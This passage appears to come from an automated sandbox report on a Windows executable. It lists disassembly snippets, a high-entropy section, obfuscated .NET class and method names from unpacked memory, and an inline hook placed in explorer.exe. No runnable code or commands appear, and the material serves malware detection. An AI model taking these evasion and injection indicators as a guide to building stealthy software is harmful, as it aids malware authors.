Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_004169F1 push esi; ret	2_2_00416A10
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_004179FC push ebp; retf	2_2_004179C2
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_00416982 push esi; ret	2_2_00416A10
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_004169B9 push esi; ret	2_2_00416A10
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0040E2E1 push es; ret	2_2_0040E2E6
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_00417A96 pushfd ; ret	2_2_00417A97
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0041D475 push eax; ret	2_2_0041D4C8
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0041D4C2 push eax; ret	2_2_0041D4C8
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0041D4CB push eax; ret	2_2_0041D532
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0041D563 push dword ptr [DF23F5C2h]; ret	2_2_0041DE68
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0041D52C push eax; ret	2_2_0041D532
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_00406DC1 push cs; retf	2_2_00406DC4
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_004175F2 push 7C54DD51h; iretd	2_2_00417610
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0041EDF5 push 00000063h; ret	2_2_0041EDF7
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0041DE6A push dword ptr [DF23F5C2h]; ret	2_2_0041DE68
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0041EE8D push ebp; iretd	2_2_0041EE8F
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_013E225F pushad ; ret	2_2_013E27F9
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_013E27FA pushad ; ret	2_2_013E27F9
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014109AD push ecx; mov dword ptr [esp], ecx	2_2_014109B6
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_013E283D push eax; iretd	2_2_013E2858
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_013E135E push eax; iretd	2_2_013E1369
Source: C:\Windows\explorer.exe	Code function: 3_2_0E5A0000 push ss; ret	3_2_0E5A000E

Source: 881SP1exr1.exe

Static PE information: 0x8254FD3C [Sat Apr 16 23:05:32 2039 UTC]

Source: initial sample

Static PE information: section name: .text entropy: 7.915189773853943

Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, iJDPmLi792wIihmm0S.cs	High entropy of concatenated method names: 'VJKA0k8Za6', 'Q21AFRlIv6', 'CDvAij9nWF', 'VHfAR34MrD', 'PUZALweoyA', 'SCUApssOA9', 'JGqADZKYeX', 'wSLAjQ5Z3l', 'X01AQoRr44', 'lQ9AZ4Z58c'
Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, EAjG53yMXMH4Na5kAU.cs	High entropy of concatenated method names: 'B989H70VcI', 'COp9x0nRxG', 'hFK9WN7gss', 'B0t9oKYLUo', 'AoQ9NNyd3W', 'Jl79IRqXie', 'N449lvFduj', 'J7x753gmFH', 'fQX7qsskxD', 'Ypk76bOFUc'
Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, Rcw6LiW7G7FubI4r8Z.cs	High entropy of concatenated method names: 'WCiHkOOAOy', 'd7dHuSeWpw', 'LN8HKPMDvg', 'eANHMMoc1s', 'k7QHAYTaO5', 'LVtHP3Q2Hj', 'yooa2WVQtOSnaaMqeb', 'ellSkGk5xZrOwP8lli', 'PVDHHN8RKK', 'r2cHxXHokp'
Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, yaCCP8NbceojIaVCpL.cs	High entropy of concatenated method names: 'Dispose', 'kgBH6v1p7J', 'JyO2L8TY0C', 'uM7YYaA23p', 'm8SHyibYku', 'XTLHzwQWwb', 'ProcessDialogKey', 'Jyy2OUgUbV', 'lv02HlYpTj', 'CiE22nAjG5'
Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, Tk6xtvZ61SwFK2ro9t.cs	High entropy of concatenated method names: 'RjnkoY2xiN', 'ytNkEX9McG', 'Pt9kll2Eeo', 'FXtly374QI', 'FKGlzLk4T1', 'X0MkOYwHuG', 'YdYkHXkLxy', 'VFAk2bnXDl', 'neYkxQ5ahu', 'aSjkW5C8Bl'
Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, QOOAOydx7dSeWpwTgP.cs	High entropy of concatenated method names: 'guANi823eH', 'S30NRQqdBf', 'qvDNvEoAqr', 'vaANVdliMU', 'TkuNGsiMER', 'OKDNYXCHJo', 'VYNN5MsMLo', 'qXuNq9Zksl', 'kaIN6MhxNR', 'gveNyydDd2'
Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, bO3xW0vMFVOE43XmPQ.cs	High entropy of concatenated method names: 'ToString', 'U0WPseRCWX', 'qkuPL9kqhZ', 'myvPpc8Ipw', 'TI1PDSEeSA', 'B6qPjd8kmR', 'xCMPQLvyII', 'vrJPZOWI3g', 'WuyP4488DZ', 'l6CPmOTroQ'
Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, AO5ZVtb3Q2HjxwUenm.cs	High entropy of concatenated method names: 'HSelcIgdn7', 'EZclNEWB9X', 'otGlIlc8A3', 'Ma4lkB0kdK', 'KDPlunD2AN', 'aGtIGWlOap', 'm3NIY0SSqR', 'X0TI5BhP9L', 'QwpIqFcUQK', 'NgvI6cMs5e'
Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, PwWgaiHx3Tv5t3uEt4D.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GmktiSKuJP', 'Uv7tRZZsOt', 'pcptvhUZGy', 'jsXtVHeKq6', 'nastGRum32', 'sKntYuSTWR', 'IDAt5xZbTs'
Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, O3yaNvmRc5AcFLPgkk.cs	High entropy of concatenated method names: 'R4hkUsHo1G', 'WTYkw0Snac', 'ATekgFNFx7', 'W6lkCInjlv', 'vGNkaYG7XN', 'vYfkenY0im', 'nNwk19trGh', 'dAMkdr0ile', 'zfxkn3AFGf', 'rankrJlK9b'
Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, y8h2NmHHHyiSIqBFoH2.cs	High entropy of concatenated method names: 'ToString', 'E2Ptx75jpa', 'bUktWEOxjL', 'uBytc6bthg', 'L8EtoywfwS', 'xFPtNCpBEd', 'zwRtEjDYXk', 'aXbtIRCb9I', 'bsPllC1OKFiJYYu3Vnp', 'BNESyR1quKQ5Ro84mhM'
Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, B16NMlTDV9sA6BMlFA.cs	High entropy of concatenated method names: 'mIuBd0JMIZ', 'Q80Bn0TSRr', 'o03Bbg5JXf', 'GJLBLVjHUH', 'IxjBDgUDrK', 'SX0Bj4lxLC', 'TYsBZpPqB1', 'odpB4IPBaW', 'csXB0Wvpun', 'AkTBss4OO4'
Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, pEtVi5z346glyXaolq.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MgU9BE1qKF', 'TNy9AE0u0p', 'PIn9P7p401', 'wfU9Xp5x28', 'Jds97v8wJk', 'h1e99wJ4gP', 't7m9t0Qa3p'
Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, YUgUbV63v0lYpTjeiE.cs	High entropy of concatenated method names: 'wDR7bfyxwG', 'xQg7LSZ8C0', 'yaP7pYweyC', 'rUI7DY78WN', 'B9P7iVFOh3', 'LSw7jPx3vp', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, wSibYkqu6TLwQWwbjy.cs	High entropy of concatenated method names: 'Nij7obiGFa', 'GkH7NIPPFO', 'HE37EsBO9l', 'GSQ7IDC6NI', 'sgs7ly1ZMN', 'sa27kf9jnc', 'BeB7uFJyWH', 'KB473jR4dC', 'Gnv7KfKcDj', 'GeZ7M3ikOX'
Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, xQMMR4HOvDpBWHNtOVk.cs	High entropy of concatenated method names: 'b3q9U7Jj9T', 'DUW9wUDTTw', 'HRf9gWXGDq', 'bS79CrxOR1', 'q1s9a6vVdX', 'yaJ9evGlCt', 'raL91Qhitp', 'Wit9djHCHm', 'tli9nCc5an', 'jqX9rOkyVG'
Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, fc1syvrZC5gZWu7QYT.cs	High entropy of concatenated method names: 'GMFIaCAIPd', 'og6I1VhrPp', 'EFjEpCppb0', 'Nu3ED2gjxU', 'mWrEjvPoNg', 'JRoEQUCYYc', 'nvPEZvAc4o', 'DsQE45QQVf', 'UHoEmSJG3k', 'nHaE0MBB73'
Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, UChBqsYrpZQR7u9Ord.cs	High entropy of concatenated method names: 'nZaXqUAXhT', 'TVVXywLpf6', 'LWo7OE8HaX', 'RMh7HvTKFR', 'mrfXsjV1OL', 'MbXXFSb60a', 'HGcXTnWFHN', 'xfpXiWJvZg', 'xarXRZXfPS', 'NRWXvRwBAK'
Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, D2VNgRut5RiPfAFHhQ.cs	High entropy of concatenated method names: 'MAIxcjatDr', 'zvnxositx7', 'QpQxNVhjM1', 'EiYxEL0R5D', 'KqqxIaGDAA', 'mKoxlANCXt', 'yKXxkWJSmc', 'Bbaxu5tl8T', 'tCEx3crQI9', 'fUYxKdtLj5'
Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, Wa22wZnN8PMDvgWANM.cs	High entropy of concatenated method names: 'HUaECJtMj9', 'JYXEeOrnLm', 'bkWEdc5eBe', 'xDJEnUpRiW', 'V1fEABq4MD', 'v12EP3NUxQ', 'YcPEXcnyl2', 'aOqE78s67t', 'qR5E929JUE', 'L1gEtAqawS'
Source: 0.2.881SP1exr1.exe.7950000.16.raw.unpack, gsGG9h2imcMQk8g6VW.cs	High entropy of concatenated method names: 'UapgT2uMV', 'IuECQx031', 'v5UeTdbtp', 'tEX1UxyY7', 'eR7nrflTg', 'dvBrgVHn6', 'GqCeqf6JDQgx3fxcYF', 'LP5QGNRwBMrSI9vWjh', 'MRi7OrDB0', 'vEXtk1uaY'
Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, iJDPmLi792wIihmm0S.cs	High entropy of concatenated method names: 'VJKA0k8Za6', 'Q21AFRlIv6', 'CDvAij9nWF', 'VHfAR34MrD', 'PUZALweoyA', 'SCUApssOA9', 'JGqADZKYeX', 'wSLAjQ5Z3l', 'X01AQoRr44', 'lQ9AZ4Z58c'
Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, EAjG53yMXMH4Na5kAU.cs	High entropy of concatenated method names: 'B989H70VcI', 'COp9x0nRxG', 'hFK9WN7gss', 'B0t9oKYLUo', 'AoQ9NNyd3W', 'Jl79IRqXie', 'N449lvFduj', 'J7x753gmFH', 'fQX7qsskxD', 'Ypk76bOFUc'
Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, Rcw6LiW7G7FubI4r8Z.cs	High entropy of concatenated method names: 'WCiHkOOAOy', 'd7dHuSeWpw', 'LN8HKPMDvg', 'eANHMMoc1s', 'k7QHAYTaO5', 'LVtHP3Q2Hj', 'yooa2WVQtOSnaaMqeb', 'ellSkGk5xZrOwP8lli', 'PVDHHN8RKK', 'r2cHxXHokp'
Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, yaCCP8NbceojIaVCpL.cs	High entropy of concatenated method names: 'Dispose', 'kgBH6v1p7J', 'JyO2L8TY0C', 'uM7YYaA23p', 'm8SHyibYku', 'XTLHzwQWwb', 'ProcessDialogKey', 'Jyy2OUgUbV', 'lv02HlYpTj', 'CiE22nAjG5'
Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, Tk6xtvZ61SwFK2ro9t.cs	High entropy of concatenated method names: 'RjnkoY2xiN', 'ytNkEX9McG', 'Pt9kll2Eeo', 'FXtly374QI', 'FKGlzLk4T1', 'X0MkOYwHuG', 'YdYkHXkLxy', 'VFAk2bnXDl', 'neYkxQ5ahu', 'aSjkW5C8Bl'
Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, QOOAOydx7dSeWpwTgP.cs	High entropy of concatenated method names: 'guANi823eH', 'S30NRQqdBf', 'qvDNvEoAqr', 'vaANVdliMU', 'TkuNGsiMER', 'OKDNYXCHJo', 'VYNN5MsMLo', 'qXuNq9Zksl', 'kaIN6MhxNR', 'gveNyydDd2'
Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, bO3xW0vMFVOE43XmPQ.cs	High entropy of concatenated method names: 'ToString', 'U0WPseRCWX', 'qkuPL9kqhZ', 'myvPpc8Ipw', 'TI1PDSEeSA', 'B6qPjd8kmR', 'xCMPQLvyII', 'vrJPZOWI3g', 'WuyP4488DZ', 'l6CPmOTroQ'
Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, AO5ZVtb3Q2HjxwUenm.cs	High entropy of concatenated method names: 'HSelcIgdn7', 'EZclNEWB9X', 'otGlIlc8A3', 'Ma4lkB0kdK', 'KDPlunD2AN', 'aGtIGWlOap', 'm3NIY0SSqR', 'X0TI5BhP9L', 'QwpIqFcUQK', 'NgvI6cMs5e'
Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, PwWgaiHx3Tv5t3uEt4D.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GmktiSKuJP', 'Uv7tRZZsOt', 'pcptvhUZGy', 'jsXtVHeKq6', 'nastGRum32', 'sKntYuSTWR', 'IDAt5xZbTs'
Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, O3yaNvmRc5AcFLPgkk.cs	High entropy of concatenated method names: 'R4hkUsHo1G', 'WTYkw0Snac', 'ATekgFNFx7', 'W6lkCInjlv', 'vGNkaYG7XN', 'vYfkenY0im', 'nNwk19trGh', 'dAMkdr0ile', 'zfxkn3AFGf', 'rankrJlK9b'
Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, y8h2NmHHHyiSIqBFoH2.cs	High entropy of concatenated method names: 'ToString', 'E2Ptx75jpa', 'bUktWEOxjL', 'uBytc6bthg', 'L8EtoywfwS', 'xFPtNCpBEd', 'zwRtEjDYXk', 'aXbtIRCb9I', 'bsPllC1OKFiJYYu3Vnp', 'BNESyR1quKQ5Ro84mhM'
Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, B16NMlTDV9sA6BMlFA.cs	High entropy of concatenated method names: 'mIuBd0JMIZ', 'Q80Bn0TSRr', 'o03Bbg5JXf', 'GJLBLVjHUH', 'IxjBDgUDrK', 'SX0Bj4lxLC', 'TYsBZpPqB1', 'odpB4IPBaW', 'csXB0Wvpun', 'AkTBss4OO4'
Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, pEtVi5z346glyXaolq.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MgU9BE1qKF', 'TNy9AE0u0p', 'PIn9P7p401', 'wfU9Xp5x28', 'Jds97v8wJk', 'h1e99wJ4gP', 't7m9t0Qa3p'
Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, YUgUbV63v0lYpTjeiE.cs	High entropy of concatenated method names: 'wDR7bfyxwG', 'xQg7LSZ8C0', 'yaP7pYweyC', 'rUI7DY78WN', 'B9P7iVFOh3', 'LSw7jPx3vp', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, wSibYkqu6TLwQWwbjy.cs	High entropy of concatenated method names: 'Nij7obiGFa', 'GkH7NIPPFO', 'HE37EsBO9l', 'GSQ7IDC6NI', 'sgs7ly1ZMN', 'sa27kf9jnc', 'BeB7uFJyWH', 'KB473jR4dC', 'Gnv7KfKcDj', 'GeZ7M3ikOX'
Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, xQMMR4HOvDpBWHNtOVk.cs	High entropy of concatenated method names: 'b3q9U7Jj9T', 'DUW9wUDTTw', 'HRf9gWXGDq', 'bS79CrxOR1', 'q1s9a6vVdX', 'yaJ9evGlCt', 'raL91Qhitp', 'Wit9djHCHm', 'tli9nCc5an', 'jqX9rOkyVG'
Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, fc1syvrZC5gZWu7QYT.cs	High entropy of concatenated method names: 'GMFIaCAIPd', 'og6I1VhrPp', 'EFjEpCppb0', 'Nu3ED2gjxU', 'mWrEjvPoNg', 'JRoEQUCYYc', 'nvPEZvAc4o', 'DsQE45QQVf', 'UHoEmSJG3k', 'nHaE0MBB73'
Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, UChBqsYrpZQR7u9Ord.cs	High entropy of concatenated method names: 'nZaXqUAXhT', 'TVVXywLpf6', 'LWo7OE8HaX', 'RMh7HvTKFR', 'mrfXsjV1OL', 'MbXXFSb60a', 'HGcXTnWFHN', 'xfpXiWJvZg', 'xarXRZXfPS', 'NRWXvRwBAK'
Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, D2VNgRut5RiPfAFHhQ.cs	High entropy of concatenated method names: 'MAIxcjatDr', 'zvnxositx7', 'QpQxNVhjM1', 'EiYxEL0R5D', 'KqqxIaGDAA', 'mKoxlANCXt', 'yKXxkWJSmc', 'Bbaxu5tl8T', 'tCEx3crQI9', 'fUYxKdtLj5'
Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, Wa22wZnN8PMDvgWANM.cs	High entropy of concatenated method names: 'HUaECJtMj9', 'JYXEeOrnLm', 'bkWEdc5eBe', 'xDJEnUpRiW', 'V1fEABq4MD', 'v12EP3NUxQ', 'YcPEXcnyl2', 'aOqE78s67t', 'qR5E929JUE', 'L1gEtAqawS'
Source: 0.2.881SP1exr1.exe.42945d0.12.raw.unpack, gsGG9h2imcMQk8g6VW.cs	High entropy of concatenated method names: 'UapgT2uMV', 'IuECQx031', 'v5UeTdbtp', 'tEX1UxyY7', 'eR7nrflTg', 'dvBrgVHn6', 'GqCeqf6JDQgx3fxcYF', 'LP5QGNRwBMrSI9vWjh', 'MRi7OrDB0', 'vEXtk1uaY'
Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, iJDPmLi792wIihmm0S.cs	High entropy of concatenated method names: 'VJKA0k8Za6', 'Q21AFRlIv6', 'CDvAij9nWF', 'VHfAR34MrD', 'PUZALweoyA', 'SCUApssOA9', 'JGqADZKYeX', 'wSLAjQ5Z3l', 'X01AQoRr44', 'lQ9AZ4Z58c'
Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, EAjG53yMXMH4Na5kAU.cs	High entropy of concatenated method names: 'B989H70VcI', 'COp9x0nRxG', 'hFK9WN7gss', 'B0t9oKYLUo', 'AoQ9NNyd3W', 'Jl79IRqXie', 'N449lvFduj', 'J7x753gmFH', 'fQX7qsskxD', 'Ypk76bOFUc'
Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, Rcw6LiW7G7FubI4r8Z.cs	High entropy of concatenated method names: 'WCiHkOOAOy', 'd7dHuSeWpw', 'LN8HKPMDvg', 'eANHMMoc1s', 'k7QHAYTaO5', 'LVtHP3Q2Hj', 'yooa2WVQtOSnaaMqeb', 'ellSkGk5xZrOwP8lli', 'PVDHHN8RKK', 'r2cHxXHokp'
Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, yaCCP8NbceojIaVCpL.cs	High entropy of concatenated method names: 'Dispose', 'kgBH6v1p7J', 'JyO2L8TY0C', 'uM7YYaA23p', 'm8SHyibYku', 'XTLHzwQWwb', 'ProcessDialogKey', 'Jyy2OUgUbV', 'lv02HlYpTj', 'CiE22nAjG5'
Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, Tk6xtvZ61SwFK2ro9t.cs	High entropy of concatenated method names: 'RjnkoY2xiN', 'ytNkEX9McG', 'Pt9kll2Eeo', 'FXtly374QI', 'FKGlzLk4T1', 'X0MkOYwHuG', 'YdYkHXkLxy', 'VFAk2bnXDl', 'neYkxQ5ahu', 'aSjkW5C8Bl'
Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, QOOAOydx7dSeWpwTgP.cs	High entropy of concatenated method names: 'guANi823eH', 'S30NRQqdBf', 'qvDNvEoAqr', 'vaANVdliMU', 'TkuNGsiMER', 'OKDNYXCHJo', 'VYNN5MsMLo', 'qXuNq9Zksl', 'kaIN6MhxNR', 'gveNyydDd2'
Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, bO3xW0vMFVOE43XmPQ.cs	High entropy of concatenated method names: 'ToString', 'U0WPseRCWX', 'qkuPL9kqhZ', 'myvPpc8Ipw', 'TI1PDSEeSA', 'B6qPjd8kmR', 'xCMPQLvyII', 'vrJPZOWI3g', 'WuyP4488DZ', 'l6CPmOTroQ'
Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, AO5ZVtb3Q2HjxwUenm.cs	High entropy of concatenated method names: 'HSelcIgdn7', 'EZclNEWB9X', 'otGlIlc8A3', 'Ma4lkB0kdK', 'KDPlunD2AN', 'aGtIGWlOap', 'm3NIY0SSqR', 'X0TI5BhP9L', 'QwpIqFcUQK', 'NgvI6cMs5e'
Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, PwWgaiHx3Tv5t3uEt4D.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GmktiSKuJP', 'Uv7tRZZsOt', 'pcptvhUZGy', 'jsXtVHeKq6', 'nastGRum32', 'sKntYuSTWR', 'IDAt5xZbTs'
Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, O3yaNvmRc5AcFLPgkk.cs	High entropy of concatenated method names: 'R4hkUsHo1G', 'WTYkw0Snac', 'ATekgFNFx7', 'W6lkCInjlv', 'vGNkaYG7XN', 'vYfkenY0im', 'nNwk19trGh', 'dAMkdr0ile', 'zfxkn3AFGf', 'rankrJlK9b'
Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, y8h2NmHHHyiSIqBFoH2.cs	High entropy of concatenated method names: 'ToString', 'E2Ptx75jpa', 'bUktWEOxjL', 'uBytc6bthg', 'L8EtoywfwS', 'xFPtNCpBEd', 'zwRtEjDYXk', 'aXbtIRCb9I', 'bsPllC1OKFiJYYu3Vnp', 'BNESyR1quKQ5Ro84mhM'
Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, B16NMlTDV9sA6BMlFA.cs	High entropy of concatenated method names: 'mIuBd0JMIZ', 'Q80Bn0TSRr', 'o03Bbg5JXf', 'GJLBLVjHUH', 'IxjBDgUDrK', 'SX0Bj4lxLC', 'TYsBZpPqB1', 'odpB4IPBaW', 'csXB0Wvpun', 'AkTBss4OO4'
Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, pEtVi5z346glyXaolq.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MgU9BE1qKF', 'TNy9AE0u0p', 'PIn9P7p401', 'wfU9Xp5x28', 'Jds97v8wJk', 'h1e99wJ4gP', 't7m9t0Qa3p'
Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, YUgUbV63v0lYpTjeiE.cs	High entropy of concatenated method names: 'wDR7bfyxwG', 'xQg7LSZ8C0', 'yaP7pYweyC', 'rUI7DY78WN', 'B9P7iVFOh3', 'LSw7jPx3vp', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, wSibYkqu6TLwQWwbjy.cs	High entropy of concatenated method names: 'Nij7obiGFa', 'GkH7NIPPFO', 'HE37EsBO9l', 'GSQ7IDC6NI', 'sgs7ly1ZMN', 'sa27kf9jnc', 'BeB7uFJyWH', 'KB473jR4dC', 'Gnv7KfKcDj', 'GeZ7M3ikOX'
Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, xQMMR4HOvDpBWHNtOVk.cs	High entropy of concatenated method names: 'b3q9U7Jj9T', 'DUW9wUDTTw', 'HRf9gWXGDq', 'bS79CrxOR1', 'q1s9a6vVdX', 'yaJ9evGlCt', 'raL91Qhitp', 'Wit9djHCHm', 'tli9nCc5an', 'jqX9rOkyVG'
Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, fc1syvrZC5gZWu7QYT.cs	High entropy of concatenated method names: 'GMFIaCAIPd', 'og6I1VhrPp', 'EFjEpCppb0', 'Nu3ED2gjxU', 'mWrEjvPoNg', 'JRoEQUCYYc', 'nvPEZvAc4o', 'DsQE45QQVf', 'UHoEmSJG3k', 'nHaE0MBB73'
Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, UChBqsYrpZQR7u9Ord.cs	High entropy of concatenated method names: 'nZaXqUAXhT', 'TVVXywLpf6', 'LWo7OE8HaX', 'RMh7HvTKFR', 'mrfXsjV1OL', 'MbXXFSb60a', 'HGcXTnWFHN', 'xfpXiWJvZg', 'xarXRZXfPS', 'NRWXvRwBAK'
Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, D2VNgRut5RiPfAFHhQ.cs	High entropy of concatenated method names: 'MAIxcjatDr', 'zvnxositx7', 'QpQxNVhjM1', 'EiYxEL0R5D', 'KqqxIaGDAA', 'mKoxlANCXt', 'yKXxkWJSmc', 'Bbaxu5tl8T', 'tCEx3crQI9', 'fUYxKdtLj5'
Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, Wa22wZnN8PMDvgWANM.cs	High entropy of concatenated method names: 'HUaECJtMj9', 'JYXEeOrnLm', 'bkWEdc5eBe', 'xDJEnUpRiW', 'V1fEABq4MD', 'v12EP3NUxQ', 'YcPEXcnyl2', 'aOqE78s67t', 'qR5E929JUE', 'L1gEtAqawS'
Source: 0.2.881SP1exr1.exe.422c9b0.11.raw.unpack, gsGG9h2imcMQk8g6VW.cs	High entropy of concatenated method names: 'UapgT2uMV', 'IuECQx031', 'v5UeTdbtp', 'tEX1UxyY7', 'eR7nrflTg', 'dvBrgVHn6', 'GqCeqf6JDQgx3fxcYF', 'LP5QGNRwBMrSI9vWjh', 'MRi7OrDB0', 'vEXtk1uaY'

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x86 0x6E 0xE1

Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
